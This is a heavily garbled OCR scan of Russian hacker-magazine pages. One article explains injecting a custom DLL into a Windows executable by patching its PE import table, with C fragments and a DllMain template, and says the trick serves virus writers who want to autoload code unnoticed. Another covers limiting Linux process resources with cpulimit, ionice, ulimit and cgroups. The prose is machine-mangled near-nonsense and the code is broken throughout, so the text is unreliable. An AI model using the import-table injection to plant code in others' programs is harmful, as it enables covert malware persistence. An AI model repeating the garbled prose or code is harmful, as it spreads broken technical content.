0 j ·1

во

~

i!)c,\..ndows\system32\sNwooi.cl

~"\..ndows\syst<m32\<hel3.cl

040f0000

Processes lo4ded: 00 Импорт

00027000

=:: sH

Get()penfieШmeW

ChooseFontW GeiRel11eW

~"\..ndows\system32\seШ32.cl

FfffFffF FfffFffF FfffFffF FfffFffF Ffffffff

FfffFffF

POC)85eiЦ>I)IgW

~ --=,-~~~·Ul.~~

-- --

00400000 00500000 00<00000 00400000 00400000 00400000 00400000 00400000 00400000 00400000 01000000

ОЕМ~rг========================================================

Lood Con/io Di'ectory Add-ess Та.

'~-;xmi ""iiXii1 _japt;oм~Нooc~e< , Fie- 0l

в,tesanlostpogo

мnmum~

00000170 00001214 000012011

---,

Pogesinfie

-

IXIOOiiiC

- [Reod 011ly]

005 Не~ Inforrмtions [tt;X]

ns Di'ectory

Oeloy -

PID OIXJ01128 00000968

~--:=:::=::=::=-;+--== =:=-ьr ОООЗIЗSО

Di'ectory

__________________________________

[1-ЕХ]

ООО4СООО

м

-...,, 0729748КЬ/4035588КЬ

notepad .exe во PETools

«таб лица импорта>>. В этой структуре содержится новость в рассуждении книжка ,

01

какие функции равным образом с каких DLL используются на программе. Именно на основе таблицы импорта загрузчик исполняемых файлов Windows принимает решения: какие динамиче ские библиотеки подгружать на

Ты неграмотный ошибся,

э ведь РЕ-файл

else

01 Oops!!! }

мнема программы , а какие- нет.

Логично предположить, почто на загрузки своей собственной

DLL

Следующим шажком ты да я должны раскопать таблиц у импорта. Для сего

довольно как только каплю соскоблить таблицу импорта , польза ее

обратимся для структуре IMAGE_OPТIONAL_HEADER , которая входит во

объем недурственно документирован . Но заранее нежели начать непо­

строение

сре дственно кодингом, ну подробнее разберемся на структуре

конгломерат с структур IMAGE_DATA_DIRECТORY. Каждый устройство массива

РЕ-файла да узнаем, на правах учинить расправу поперед этой таблицы.

IMAGE_NT_HEADERS. В IMAGE_OPТIONAL_HEADER будем высматривать

описывает какую-нибудь важную чтобы исполняемых файлов таблицу. Треб ую щаяся нам оповещение об импорте содержится на элементе

РЕ-ФОРМАТ И ТАБЛИ

А ИМПОРТА

от индексом IMAGE_DIRECTORY_ENTRY_IMPORT либо — либо 0. Сама конфигурация

Любой исполняемый обложка Windows имеет 005 Неаdег. Он находится

I MAGE_DATA_DIRECTORY выглядит следующим образом:

во самом начале файла равным образом суп его равнина e_magic согласно смещению eeh ДОЛЖНО со поддерживать ЧИСЛО

0A4Dh (IMAGE_DOS_SIGNATURE) ИЛИ, говоря <<MZ>>. Поле e_lfanew все праздник а структуры IMAGE_DOS_HEADER хранит сме щение бери РЕ­ на человеческом языке, латинские буквы

из-за головок файла. Структуру, описывающую таковой заголовок, позволено

Описание

IMAGE_DATA_DIRECTORY typedef struct _IMAGE_DATA_DIRECTORY DWORD VirtualAddress; DWORD Size;

сыскать во файле winnt.h подо названием IMAGE_NT_HEADERS. П ервое ее раздолье зто

DWORD Signature, которое необходимо включать число 4550h или, иначе, <<Р Е » . Таким образом, преддверие началом работы с файлом нам нужно испытать присутствие во нем в соответствии с нужным смещениям сигнатур MZ равно РЕ, так чтобы убедиться, аюшки? пизда нами действительно РЕ-файл. Проверка

приборы файла

для РЕ-формату

ВУТЕ *buff=new BYTE[file_size);

01 ... читаем

РЕ-файл на переменную buff ...

i f ((PIMAGE_DOS_HEADER)buff)·>e_magic TURE)

IMAGE_DOS_SIGNA·

{ PIMAGE_NT_HEADERS nth=(PIMAGE_NT_HEADERS )((DWORD) ((P IМAGE_DOS_HEADER)buff) ->e_lfanew) + (DWORD)buff); i f (nth->Signature==IMAGE_NT_SIGNATURE)

ХАКЕР

01/154/2011

Hiew во действии

011


КОДИНГ

Вся сочинение на одной картинке

-----J

t y pe d ef

L

str uct _IМAGE_OPТIONAL_HEADER

{ ВУТЕ ВУТЕ

MajorLinkerVersion; MinorlinkerVersion;

{ WORO e_magic;

DWORD SizeOfUninitializedData;

WORD е_сЫр;

OWORD OWORD DWORD DWORD

е_ ср;

WORD

WORD e_crlc; WORD WORD WORD WORD

e_cparhdr; e_minalloc; e_maxalloc;

DWORD TimeDateStamp; OWORD ForwarderChain; OWORD Name; OWORD FirstThunk; } IМAG Е_ IMPORT_ OESC RI PTOR;

AddressOfEntryPoint; BaseOfCode; BaseOfOata; ImageBase;

OWORD SectionAlignment; OWORO FileAlignment;

WORD MajorOperatingSystemVersion; WORD MinorOperatingSystemVersion;

e_ss;

WORD e_sp;

WORD MajorimageVersion; WORD MinorimageVersion; WORD MajorSubsystemVersion; WORD MinorSubsystemVersion; DWORD Win32VersionValue;

WORD e_csum; WORD e_ip;

WORD e_cs; WORD e_lfarlc;

WORD e_ovno; WORD e_res [ 0];

DWORD SizeOflmage;

WORD e_oemid; WORD e_oeminfo;

DWORD CheckSum;

L

type def struct _IМAGE_IMPORT_BY_NAМE { WORD Hint; ВУТЕ Name[ l ];

DWORD SizeOfHeaders;

01 для самом деле ., тогда неграмотный один 11 все в равной степени какой длины ASCIZ-cтpoкa IМAGE_IMPORT_BY_NAМE;

}

LONG e_lfanew;

OWORD SizeOfStackCommit;

а

{ DWORD VirtualAddress; DWORD Size;

DWORD LoaderF lags;

OWORD NumberOfRvaAndSizes; IМAGE_DATA_DIRECTORY OataDirectory[ lб

}

_IМAGE_DATA_DIRECTORY

- i typedef str u ct

DWORD SizeOfHeapReserve; DWORD SizeOfHeapCommit;

}

J;

IМAGE_DATA_DIRECTORY;

IМAGE_OPТIONAL_HEADER;

L

_IМAGE_NT _HEAOERS

{

type d ef struct _IМAGE_ THUNK_DATA {

uni on { OWORD ForwarderString; 01 РВУТ Е DWORD Function; 11 POWORD

DWORD Signature; IМAGE_FILE_HEADER FileHeader; IМAGE_OPТIONAL_HEADER32 OptionalHeader;

}

байт,

WORD Subsystem; WORD DllCharacteristics; DWORD SizeOfStackReserve;

WORO e_res2[10]; } *PIМAGE_DOS_HEADER ;

ч ty pe d ef st ruc t

{

Characteristics; OriginalFirstThunk;

};

DWORD SizeOfCode; DWORD SizeOflnitializedData;

t y pe def str uc t _ IМAGE_DOS_HEADER

_IМAGE_IMPORT_DESCRIPTOR

typedef str u ct un ion { DWORD DWORD

WORD Magic;

DWORD Ordinal; DWORD Ad<J..r2'ss0f0ata; } ul;

*PIМAGE_NT_HEADERS32;

}

01

PIМAGE _IMPORT _ВУ_NАМЕ

IМAGE_THUNK_DATA;

Как домчаться по импорта

} IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;

/1 RVA таблиuы импорта DWORD impRVA=пth->OptioпalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY _IMPORT]. VirtualAddress_;

Поле ViгtuaiAddгess охватывает что-то около называемый RVA [гelative viгtual

~атель первой

addгessl, в таком случае очищать кажущийся адрес, базированный насчет

PIMAGE_SECTION_HEADER

ImageBase. Если RVA таблицы импорта у нас равняется 0eeeh, а ImageBase - ee4eeeeeh, так наш брат получим совершенный кажущийся код равный ee4e1eeeh.

секuии iпFileSec

IMAGE_FIRST_SECTION(пth);

/1

коэффициент секции,

WORD

impSeciпdex

идеже н аходится сетка им п гвалт т а

=- 0;

Но тута автор сих строк встречаем бульон препятствие- заниматься не без; бинарни­ ком пишущий сии строки будем получи и распишись жестком диске, малограмотный загружая его во память. Вернее,

for ( si ze_t i=е ; i

наша сестра его загрузим во выше- буфер, однако безвыгодный будем расставлять секции да

{

<

поs- 0 ;

i++)_

i f (impRVA >=inFileSec[i].VirtualAddress && impRVA < inFileSec[~+ 0 ].VirtualAddress)

другие важные части РЕ-файла за своим местам на виртуальном

адресном пространстве. Поэтому нам потребно сделать подсчет физическое

освобождение таблицы импорта на файле [или, говоря по-другому,

RAW offsetl. Для зтого автор сих строк должны определить, на экий секции РЕ-файла находится lmpoгt tаЫе, удержать с RVA таблицы RVA

impSecindex=i; break;

секции равным образом примолвить полученное количество ко PoiпterToRawData секции.

}

Сама матрица секций [объектов! находится самый вслед РЕ Неаdег, а сумма элементов во этой таблице определяется по­ лем NumbeгOfSections структуры

IMAGE_FILE_HEADER.

Вооружив­

шись этими знаниями, попробуем черкануть код, тот или другой высчи­

тает физическое снятие таблицы импорта на модифицируемом

01

физическое сдвиг табли цы им п орта во файле

DWORD impRawOffset=inFileSec[impSecindex]. PointerToRawData + impRVA;

исполняемом файле .

ПРАВИМ ИМПОРТ Считаем

U ...в

RAW Offset ради Import ТаЫе buff у нате со почувствованный РЕ - обложка . .•

После того в духе автор сих строк узнали надсыл таблицы импорта, дозволено заняться непосредственным внедрением

DLL. Но на первых порах надлежит обкашлять

структуру lmpoгt ТаЫе. По адресу, какой-никакой пишущий сии строки получили, нахо-

PIMAGE NT HEADERS пth=_(PIMAGE_N1_HEADEB~)(( DWOIOL) ((PIMAGE_DOS_HEADER)buff)~e_lfaпew) + ( DWORD )buff);

дится библиография импорта. Фактически сие конгломерат изо структур вроде

IMAGE_IMPORT_DESCRIPTOR.

На каждую импортируемую динамическую

библиотеку доводится по образу мало-мало одна протокол

L/

для ол-во от ек ци й во фа й л е

WORD

012

поs

=

пth->FileHeader.NumberOfSectioпs;

IMAGE_IMPORT_ DESCRIPTOR . Давай взглянем, который но представляет с себя эта структура.

ХАКЕР

01 / 054/2 011


ОLL-хардкодинг

Описание

IMAGE_IMPORT_DESCRIPTOR

BY_NAME как и желательно разместить на свободном nространстве тела исполняемого файла . При этом долженствует опять же видоизменить адреса равным образом

typedef struct _IMAGE_IMPORT_DESCRIPTOR union { DWORD Characteristics; DWORD OriginalFirstThunk;

размеры данных в и

DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT) DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT) . Задача буква требует хорошего запас РЕ-формата инекоторого

напряжения мозга. Альтернативный вариант- впихнуть ан фуй что до

}; DWORD TimeDateStamp; DWORD ForwarderChain; DWORD Name; DWORD FirstThunk; } IMAGE_IMPORT_DESCRIPTOR;

добавляемой библиотеке непосредственно на те места, идеже симпатия равно была бы, если бы

Тут нас интересуют три nоля:

Благодаря тому, который сведения об импортируемых именах может

Name- сие RVA

являться раскидана за всему файлу, наш брат имеем мочь стоит

бы симпатия добавлялась тама линкером, а безвыгодный нами. Но во этом случае нам придется подвести итог во импорте весь

RVA да взять в соображение то, в чем дело? к тому дело идет

nонадобится качать структуры, которые общий безвыгодный имеют никакого отношения для имnорту.

Первый вариант, возьми мои взгляд, намного не задавайся во реализации .

ваться нулем

Name, OriginalFirstThunk равным образом FirstThunk. импортируемой DLL. Имя необходимо заканчи­

имени

IDxDDI,

а рядом этом протяжение этой строки должна фигурировать

пластично ее трансформировать . Более того, твоя милость инда можешь надумать побольше

кратна двум. То есть, ежели я импортируем keгne132.dll, в таком случае долгота

изящное решение. Но, повторюсь сызнова раз, что такое? раньше нежели обещать вслед за

строки имени на байтах с вместе с завершающим нулевым полноте равна

это, следует расколупать отнюдь не одиночный РЕ-файл .

03, что такое? безграмотный кратно 0. Позтому во конце ты да я должны прибавить вновь безраздельно

ПОДГОТАВЛИВАЕМ

нолик.

OгiginaiFiгstТhunk включает на себя

RVA

массива

IMAGE_THUNK_DATA,

DLL

Когда я разобрались из внутренним устройством исполняемых

тот или другой принуждён иссякать нулевым элементом . Сама строение

файлов

IMAGE_THUNK_DATA- сие прямо-таки двойное слово, которое на большин­ стве слу чаев является RVA структуры IMAGE_IMPORT_BY_NAME . В этой структу ре хранится nоле Hint размером 0 байта, которое служит для ускоре ния поиска имен во импортируемой DLL, равным образом напрямую

импорт, час начать самой

название импортируемой функции, которое равным образом должен являться выровнено на границу во двум байта.

Windows да написали код, тот или иной добавляет библиотеку в DLL. Для основы выкладывай взглянем получи и распишись

шаблонную реализацию главной функции динамической библиотеки.

DllMain BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)

FiгstТhunk- сие в сущности коnия OгiginaiFiгstТhunk, ведь кушать она содержитте но

RVA

получи и распишись

ась? да OгiginaiFiгstТhunk,

IMAGE_THUNK_DATA,

switch (ul_reason_for_call)

только загрузчик РЕ-файлов изменит ее содержание присутствие связывании от

{

библиотекой. Там будут крутиться адреса имnортируемых функций.

case DLL_PROCESS_ATTACH: : :MessageBox(NULL, "Загрузилось" , "Выполняем шифр DLL" , МВ_ОК); break ; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break ;

Теперь, в некоторых случаях ты да я знаем, как бы устроены ливер импорта во РЕ­ файле, автор можем вчинить инжектить свою

DLL.

Для сего нам следует

прирастить на директорию импорта чисто заполненную структуру

IMAGE_IMPORT_DESCRIPTOR. Добавляем

01

IMAGE IMPORT_DESCRIPTOR

первая состав

IMAGE_IMPORT_DESCRIPTOR

во таблице

импорта

}

PIMAGE_IMPORT_DESCRIPTOR iid=(PIMAGE_IMPORT_DESCRIPTOR) (impRawOffset + (DWORD)buff);

return TRUE;

01

В параметре ul_гeason _foг_ca ll наша сестра nолучаем причину, сообразно которой

ищем финальный штука таблицы

while (iid->Name !=е ) iid++;

была вызвана

DIIMain. В случае, при случае этой nричиной является за­

пись по отношению нас во таблице импорта ехе-файла, во ul_гeason_foг_call автор по­

01

лучим DLL_PROC ESS_AПACH. Далее можем облечь плотью и кровью всякий код,

заполняем структуру IМAGE_IMPORT_DESCRIPTOR

каковой всего лишь захотим, на контексте процесса, на исnолняемый обложка

filliiD(iid);

которого да мы со тобой заинжектили нашу

01

iid++; ZeroMemory(iid, sizeof (IMAGE_IMPORT_DESCRIPTOR)); Но шелковица снедать под масть проблем. Во-первых, nри добавлении очередного элемента размер массива увеличится нате sizeof(IMAGE_IMPORT_ DESCRIPTOR). Скорее всего, сие приведет ко тому, в чем дело? я затрем кусок

инфы, в которую ссылается OriginalFirstтhunk. Во-вторых, по­ мимо

IMAGE_IMPORT_DESCRIPTOR,

нам нужно снова сотворить равным образом набиться в духе сельди в бочку

FirstThunk,

а да ан фу-ты

DIIMain, ведь на таблице

импорта достанет задать общей сложности одну функцию с нашей библиоте­

ки. Это нам бери руку, таково равно как положение от нехваткой места для того добавления доnолнительных данных по части

массивы согласно адресам OriginalFirstтhunk равно

DLL.

Поскольку всё необходимый нам шифр выnолняется на

добавляем доделывающий никакой звено

DLL довольно-таки

актуальна. Главное,

с целью наша DLL экспортировала имя, которое пишущий сии строки укажем на импорте.

ДЛЯ ЧЕГО ЭТО НУЖНО Все, ась? пишущий эти строки тогда описал, на первую колонна пригодится вирмейкерам. Наnример, дозволяется присчитать свою автозагрузке

DLL ко программе, которая овчинка выделки стоит в Windows. Даже самые умные пользователи не факт ли

по части RVA во равнина Name . Для лишь сего нужно отыскать свободное поле на

найдут причину непонятного поведения своего компьютера [если ты,

РЕ-файле, чтоб отнюдь не уничтожить несколько нужное.

конечно, запрограммируешь сие аллопрининг во DIIMainl.

Самое nростое решение- сие перетащить таблицу во директорию

Также ёбаный уловка позволено употреблять с целью перехвата

API

во испол­

импорта [массив, камо автор добавим IMAGE_IMPORT_DESCRIPTORJ, во

няемом файле. Есть, конечно, паче nодходящие для того сего способы,

прекращение какой-либо секции. Так в духе секции во РЕ-файле как правило

так да средство со хардкод-инжектом

выравниваются в области какой-либо границе, в таком случае у нас требуется бытийствовать до­

DLL имеет резон получи и распишись существование.

Но во любом случае про правильной реализации всего делов туточки

стато чно места, с намерением впихнуть тама нужные причина . Таблицы до

описанного потребуется хорошее компетентность РЕ-формата, исправный

адресам OriginalFirstтhunk да

да зрелый код, а вот и все длительные тесты возьми разнообразных

FirstThunk,

кличка инжектируемой

DLL согласно адресу во Name, а как и конгломерат изо структур IMAGE_IMPORT_

ХАКЕР

01 /154/2011

nрограммах. :Х:

013


Женюша Зобнин lexecbit.гul

Поб~да в воине

вслед ресурсы ОГРАНИЧИВАЕМ LINUХ­

ПРИЛОЖЕНИЯ В РЕСУРСАХ СИСТЕМЫ

I:J:Iiullllli Е сть кусок причин что до г ра н ичивать п риложе н ия во ресурсах. Н а п ри­ мер, некото ры е изо них промежуток времени что до т времени дают заминка равно начинаю т объединение

полной г рузи т ь сердце компьютера !при ве т Adobe l. Постоя нн что касается п ереза п уска т ь их сли ш колтун утомите л ьно равным образом неин т ерес н о, да yes ли усик т а н обвить та для ому

подле л ожению сдерживание получай

00% п роцессарного време н и- оно н е

сможет спутать планы твоей работе. Таким но образом мож н касательно в отношении г раничи­ вать да н еко т орые вя л отеку щ ие тяжба ы , получай пр име р ко д ирование

видео, которое `иначе буд ет либо т ормозить на есь ос т ал ь утнапиштим софт,

либо перемешивать из п ать через д ико реву щ его п ро ц ессар н об г касательно кулон ера. Чтобы сотрудничающий н а фо н е

wget безграмотный меш л веб-серфи нг у, д ос т у пн ый

ему интер н ет-канал не грех ушить получи и распишись п насчёт л овину насчёт т шири ны реа льн что до ­

го. Ч тобы торрент-к л иент во по отношению д равно н п рекрас н ый моме нт н е забил авторитет ь д иск, масштаб д иска в целях этой пр в отношении г ра м ты да я мож н по части ог ранич равно ть . В се э т о можно содеять вместе с п омо щ ью прос т ых во равным образом со п ользо на а н да да ути лит, а как и

В

Linux

будет бесчисленно средств

ограничения приложений в возможностях . Это да стандартные права доступа, да брандмауер , и такие комплексные системы,

в духе

SELinux

равно Аррдгmог. Но вроде

обусловить приложения на ресурсах?

мо щ нейшего механизма cgгo u ps, далеко не где-то д авно за пределами д рен н ого во Liп ux.

ПРОЦЕССОРИ ЕГО ЯДРА Д умаю, целое знают касательно самом нетрудно м равным образом у н равно на ерсальном мето д е огр ин и­

чения приложений на процессо рн ых ресурсах. Это в такой мере н азываемый приоритет ис п олнения, значени автор этих строк ко т насчёт р что до г по части ко л еб л ются с

09.

-2 0 д касательно

Возможность изменени ваш покорный слуга пр иоритета п холм во что касается л яе т нам у п рав л ять

п л анировщиком процессов, указывая ему для то, в качестве кого равно е п р оцессы

lприложе н равно ваш покорный слуга l д олжны по части л внушать свыше процессар н по отношению г в рассуждении вр еме н и. Ес л и, н апример, наш брат ради п устим me n codeг из самым н изким приорите т ом исполнения:

Например , обратить внимание одному приложению

00 % процессарного времени, другому- 0% оперативки , а третьему- токмо 028 Кб ширины интернет-канала? Об этом наша сестра и поговорим на данной статье .

$ nice -n 0 0 mencode r -ovc la vc -lavc opt s \ v codec;mpeg in- vi deo . av i

out -v id eo . avi

То возлюбленный никакими силами об р азом н е со м ожет спутать планы н а ш ей рабо т е из си ­ стемой. П роцессы m encode г буду т совершенно гда нахо д равно т ься на самом ко нц е оче р е д да да согласно л у ч ат у п ра во ле н ие ведь л ько т что до гд а, когда-когда nр об ц ессо р н е

буд е т нужен никакому д ру г ому подле л оже н ию. Каза л ос ь бы, э т в рассуждении заме­ ч а т е ль н ы й мето д огра нич е н да моя особа п ри л оже н ий во р есу р сах n ро ц ессора,

так некто работает так ль ко т олько во томище от л учае, ко гд а есть ть ко н ку р е нц равным образом я за р есурсы nро ц ессо р а. Е сл равным образом а из-за п усти т ь n ри л ожение со низким

-

Команды

равным образом

присутствие по отношению рит е т ом, ко гда во системе н ет дру ги х ак ти во ны х п р да л ожений ! на­

пр имер, н что касается ч ью ! , касательно н насчёт на се рав н относительно п насчёт лн ос т ью заг р уз ит п ро ц ессо р ! что, в свою в отношении ч е р е д ь, nриве д ет для п что касается дн ваш покорнейший слуга т ию ч а ст через ы рабо твоя милость ради ц ессо р а, е г об

н агреву равным образом крат г в рассуждении н у охл а ж д ающе г относительно куле р а l . В таких си т уа ц иях сле д американский рубль т

nice

ionice позволительно

Утилита

cpulimit никак не

складывает

режим всех

комбинировать,

имеющихся nроцессорав системы,

образуя цепочки

оттого дай тебе дать разрешение

следующего вида:

nрограмме наnоловину нагрузить

«nice -n 09 ionice -с2

четверка х Ъядерный nроцессор,

-n7

следуетуказывать

приложен ие н .

000%.

п рименят ь др угие ме т по части д ы. н а пр име р ут равно ли т у Ут баткак да та

cpulim it

cpu limit .

н е равно зме ня ет пр иори те т прил ожен да я, а n р осто

приостанав л ивает его ис п в отношении лн е ни е во моме нты , когд а соответственно тр ебле ни е

ради ц ессара выхо д ит ради граница после д а нн в рассуждении г в рассуждении ли ми т а !это д е л ается с помо щ ью бана л ьного си г получи ла SIGSTO PI. П что касается пр по части ш есть тв ии н екоторого време н равно р абота приложения возоб н по отношению вля ется вместе с п омо щ ью не без; игн ала

ХАКЕР

01/154/2011


Победа во войне следовать резервы

SIGCONT,

по причине чему создается обман замедления работы

Утилита

cpulimit может корпеть на Liпux, FгeeBSD да других РОSIХ­

совместимых ОС. Установить ее дозволено не без; через дистрибутивного па кета:

cpulimit. Чт обы привести в действие при­ ложение подо управлением cpulimit, шабаш реализовать следую­ щую команду : cpulimit - -ехе приложе ние - -limi t прибыль _ sudo apt-get

>

ls / mnt/cgroups / io_merged io_queued Ыkio . io_service_bytes Ыkio . io_serviced Ь lk io. io_seгv ice_ t ime Ыkio . io_wait_time Ы k io . reset_stats

cpuset .memory_migrate cpuset . memory_pressure

Ыkio .

приложения.

iпstall

процессора. Ограничить дозволяется да поуже работающие процессы:

cpulimit --pid 0960 --limit 05. Но сие покамест малограмотный все. С через cpu limit

Ыkio .

cpuset . memory_pressuгe_enab 0ed

cpuset . memory_spread_page cpuset . memary_spгead_s 0аЬ

cpuset . mems cpuset . sched_load_ba lance

Ыkio . sectors

cpuset . sched_гe 0ax_doma i n_leve 0

throttle . io_serv ice_bytes throttle. io_serviced Ыkio . thrott le. read_bps_dev ice Ы k io. throt t le. read_ iops _dev ice Ы k io . thrott le . wri te_bps_dev ice Ы k io . throt t le. wri te_ iops_dev ice Ыkio. t ime Ьlkio .weight Ы k io. we ight_dev ice cgroup . со lone_chi ldren cgroup. event_control cgroup . procs cpuacct . stat cpuacct . usage cpuacct . usage_percpu cpu .rt_period_us

cpu . shares de v ices .allow dev i ces. deny devices . list me memory.fai lcnt memory . force_empty memoгy , 0 imi t_ in_bytes memory . ma•_usage_in_bytes memory. move_charge_at_ immigrate memory . numa_stat memory . oom_contro 0 memory. soft_l imi t _ in_bytes

Ыkio . Ьlkio .

для це ссами позволительно управ­

лять динамически. П ользователь abcuseг бери форуме ubuпtufoгums.

огg опубликовал красивый скри пт, какой си дит бери фоне и автоматически заключает ограниченность процессарного времени пользу кого

приложений, отъедающих чище положенного . Это скрипт, кто

позволительно выискать получи и распишись нашем диске [cpulimit_daemoп.sh). Ег насчёт надлежит ско­ пировать во обложка /usг/local/biп равно обновить первые четверка строки:

# vi /usr/local/bin/cpulimit_daemon.sh # Максимальный доход съедаемого процессара CPU_LIMIT;20 # Интервал проверок на один момент

memoгy.

stat

memory , swapp i ness

memory. usage_in_bytes

Содержимое каталога /mnt/cgгoups

DAEMON_INTERVAL; З

Ш Группа gля пользоВателя

# Черный оглавление ограничиваемых процессов # Если пуст, короче применяться снег список BLACK_PROCESSES_LIST;npviewer.bin # Белый каталог - далеко не срезать сии процессы WH ITE_PROCESSES_LIST;

gгoup регm

#

Кто может упраВлять лuмuтамu?

admin { uid=UID

пользоВателя

}

Здесь моя особа указал только лишь одно ограничиваемое приложение­

#

прviеwег.Ьiп, сие загрузчик плагинов на браузеров !обычно симпатия под­ гружает Flash-плeep через

me { {

Кто может gоБаВлять процессы В гуппу?

task { uid=UID

Adobe, кто славится своей пр ожорливо­

стью ). Ты можешь повысить блэклист в соответствии с своему усмотрению. Н ужно

пользоВателя

отдать скрипту резон получи исполнение:

}

#

$ sudo chmod 000 /usr/ bin /c pulimit_daemon. sh Д алее возьми не без; диска скрипт cpulimit, ско п ируй его во оглавление /etc/ iпit.d равно хайло н ови н а него правильные компетенция вплоть до от т упа :

$ sudo chown root:root /etc / init.d /cp ulimit $ sudo chmod 055 /etc / init .d/cpulimit

К какuм поgсuстемам прuВязана каста группа?

cpu { } memoгy { } Ыkio { } group me/npvieweг { cpu { cpu.shaгes=100;

Запусти равно добавь во автозапуск:

memoгy

$ sudo /etc /i nit.d /c pulimit start $ sudo update-rc.d cpulimit default s

{

memoгy.limit

in bytes= •

000М;

(!i!Jg,J , Jil. нg ,J,JMi3 ,J,JI

Теперь указанные во хруст т е процессы будут по-под наблюдением и никогда далеко не съедят лишше положенного куска процессора.

ПАМЯТИ МНОГО НЕ БЫВАЕТ

Редактируем конфиг cgгoups

Однако з д есь кроется п одвох : что касается дна жды снизив лимит, его уж

Ограничить широта доступной процессу п амя ти до сего поры проще. В любом

воспрещается взвеять еще раз !это выполнено к безопаснос ти) , почему

РОSIХ - совместимом командном интерпретаторе питаться повеление

уловка из установкой лимита, запуском нужного приложения равным образом его

ulimit, которая позволяет запускать некоторыми ограничениями,

последующим сня т ием отнюдь не пройдет. Выйти изо этой ситуации можно,

накладываемыми возьми порождаемые ей пр в рассуждении це ссы !для сего ис­

запустив свежеиспеченный сигнальный истолкователь равно установив норма сделано

пользуется систем н ый затребование setгlimit). По умолчанию первенствующий

на нем. Д елать сие ручной необязательно, достанет построить про­

истолкователь хоть твоя милость что-нибудь хочешь безвыгодный огра ничив ает разме р оперативной п амя ти ,

замереть скри пт :

доступной приложениям, на нежели дозволено убе дить ся, из-за п устив следую­

#!/bin/sh ulimit -m $1 $2

щую команду :

$ ulimit -m unlimited

Сохра нив э т что касается т из крипт во обложка -/Ьiп/ml imit равным образом рот н овив возьми н его флаг Чтобы переправить это, по статочно отдать размер лимитура нате

исполнения, не возбраняется бросать приложения от насчёт гр аниче ни ем нате объ-

мнемозина во качестве аргумента искажение нды . Например, поставить ограничение

ем доступной памяти следующим образом:

по части потреблению памяти на

xterm.

000

Мб дозволительно в такой мере

0100 • 0024

Кб;

000

Мб):

mlimit $( (50*1024))

Почти ведь но самое делает добавление около названием softlimit

$ ulimit -m $((100*1024))

ХАКЕР

01 / 054/ 0011

l goo.gi/Qгc7k ).

015


UNIXOID $ sudo ionice -с2 -n7 traпsmissioп

АНАЛОГСУПЕРПАТЧА В 000 СТРОК, УСКОРЯЮЩЕГО ПРОИЗВОДИТЕЛЬНОСТЬ СИСТЕМЫ

тетом ввода-вывода. В все так же какой секунда преимущество э в таком случае го приложения

Пишем во обложка /etc/гc.local сле дую щ ие строки:

$ sudo ioпice -сЗ -р 0234

mount -t cgroup cgroup /sys/ f s/c gr~p /cp u mkdir -m е777 /sys/ fs /c group/c pu / user

Эта майна запустит торрент-клиент из самым низким приори­

дозволяется буд е т измени ть из через целое того но ioпice. Например, из ле­ дую щ ая распоряжение хайло н ови т первенство класса

ldle

пользу кого процесса

0234:

Такой уловка удоб н насчёт воспользоваться во слу ча ях , рано или поздно вставка

cpu

начинает от лиш комок во всю силу подвизаться из жестким ди ско м да стопо ­

рит весь оста льны е пр оцессы. Убивать е г касательно жалко, а вот т сдержать

Исполняем их:

работу весь возможно. Также не грех подрезать крылья добавление на внутренние резервы после 3 си

$_ sudo sh_Let!J_cc .local

по части перед е л е нн что до го объема данны х держи ди ск. Во вс ех н иксах кушать п по отношению д­

Создание файла -/.config/autostaгt/cgгoup.sh следую щ его

держка ди сков ы х квот, которые позволяется ис п насчёт л ьзова ть в целях установки

со держания:

лимитень получай диапазон настрого го диска с целью каждого пользователя. Этот а

mkdir -m е7ее /sys/fs /cgroup /c pu / us er /$$ echo_j$ ~/ sy2}~~roup Lcpu/usecJ$$L!asks

орудие подойдет равно чтобы ограничения индивидуальных прил ожений, достаточно исключительно запуска ть их вместе с прав ами разных юзеров. Н апр равным образом мер, если охота ограни чи ть формат дискового п рос тр анства в целях програм­

Перезапуск графической оболочки.

ты да я tгansmiss i oп

000 г да г абайтами, нуждаться учинить сле д ующее :

Добавляем на систему нового пользователя !пусть его название довольно

0.

quota_100gb]:

$ sudo adduser quota_leegb ПОЛОЖИТЕ ДИСК НА МЕСТО Теперь поговорим насчёт дисках . Е со ть равно как худо-бедно двум об л мастак ти , во которых

позволительно лимитировать приложения близ р аботе вместе с д иском: а] приоритет ввода-вывода , каковой позволительно сниз ить с целью по части тд ельно взятых прило­

жений, с намерением они отнюдь не загружали жес т киек прослойка равным образом безвыгодный вестингауз другими словами работу

других приложений равным образом всей сис т емы на целом; б ] тотальный величина доступ­ ного пространства да высший размер сохраняемых файлов,

упра вляя которыми, мож н что касается избежать ситуаций, когда-когда насчёт дна софтина полностью заполняет твердый снаряд своими данными.

Первая поручение решается вместе с через утилиты по-под незамысло­ ватым названием i oпice. Как равно личный товарищ без участия приставки

io,

симпатия по­

зволяе т устанавлива ть индивидуальные подле оритетына первый попавшийся про­ ц есс, при всем том действует во отношении планировщика ввода-вывода,

а безграмотный планировщика процессов . Ут илита ioпice д елит совершенно возможные

tap- 02:813:07 up 03 days , 00 min . 0 users . Tasks: 034 total, 2 runпing , 026 sleeping,

L...... Swap:

09652k cached

fгее,

ljij!.!Щ

В

00

В

В

В

В

00

В

В

В В В

08 20 2В

054m 05m 0716 0 261m 0576 0128 S 15Bm 01m 088В 0 85Bm 03m 092В 0 852m 06m 0624 0 8 В В S 1В784 014В 828 R 1B94m 099m 05m 0 SBlm 007m 08m S 852m 04m 0464 S 3916 016 088 0

0 Э

0 1 1

0.3 094:37.В1 Х 0.4 058 :83.76 chromium В.6 12:53.15 l il yteгm В. 0 1:15. В4 chгomium В.8 1:42.79 chгomium

В

В.В

В

B.l 9.9 5.3 0.7

В В В

B:Bl.lВ lcwoгkeг / 0 :8

B:BB.BS top 28 : 05 .8В chгomium 57:81.131 chгomium 1:27.12 chгamium

В

В

В

S

В В

В.В В.В

init

00

В В

В :26 . В7

root

0 :01 . 02

kthгeadd

08

В

В

В

В

S

В

0 .8

0 :85 . 01

ksoftiгqd/8

б гооt

RT

В

В

В

В

В.В

В : ВВ.ВВ migгation / B

В

-20

В

В

В

В

В.В

В:ВВ.ВВ

гооt

В -2В

В

В

В

В

В.В

В : ВВ . ВВ khelpeг

гооt гооt

В

-213

00

В

·В В

В е

В В

0 S 5 5 S

